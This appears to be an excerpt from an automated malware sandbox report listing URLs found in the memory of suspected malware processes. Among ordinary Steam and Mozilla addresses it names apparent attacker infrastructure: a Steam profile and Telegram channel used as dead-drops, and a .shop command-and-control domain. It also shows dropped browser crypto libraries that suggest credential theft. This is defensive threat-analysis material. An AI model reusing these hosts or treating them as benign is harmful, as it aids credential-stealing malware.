Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: GIIDBG.9.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.2041938278.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/ho
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/m
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 5358.exe, 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: GDHIII.9.dr	String found in binary or memory: https://support.mozilla.org
Source: GDHIII.9.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GDHIII.9.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 5358.exe, 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwin
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/%%
Source: A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/(
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/_o5e
Source: A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/r
